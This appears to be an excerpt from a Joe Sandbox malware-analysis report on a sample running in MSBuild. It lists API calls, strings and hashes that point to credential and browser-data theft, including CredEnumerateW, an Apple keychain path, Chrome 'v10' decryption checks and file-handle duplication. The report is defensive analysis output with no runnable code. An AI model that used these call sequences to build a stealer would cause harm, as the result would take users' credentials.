  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                            • API String ID: 708747863-3398334509
                                                                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                            • free.MSVCRT ref: 00418803
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1355100292-0
                                                                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$FirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1690352074-0
                                                                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoSystemmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3558857096-0
                                                                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                             • Control-flow graph of the function starting at 44553b (basic-block edge list rendered by the sandbox; not reproduced here)
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                                                                            • memset.MSVCRT ref: 00445725
                                                                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                                                                            • memset.MSVCRT ref: 00445755
                                                                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                            • memset.MSVCRT ref: 00445986
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                            • API String ID: 2263259095-3798722523
                                                                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                                                                            • API String ID: 2744995895-28296030
                                                                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                            • String ID: chp$v10
                                                                                                                                            • API String ID: 4165125987-2783969131
                                                                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                            • free.MSVCRT ref: 0040E49A
                                                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E3EC
                                                                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E407
                                                                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E422
                                                                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E43D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                            • API String ID: 3849927982-2252543386
                                                                                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3715365532-3916222277
                                                                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                            • API String ID: 1344430650-1740548384
                                                                                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898
• Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
• Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Control-flow Graph (rendered graph; edge list omitted)

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382
• Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
• Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph (rendered graph; edge list omitted)

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
• Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Control-flow Graph

APIs
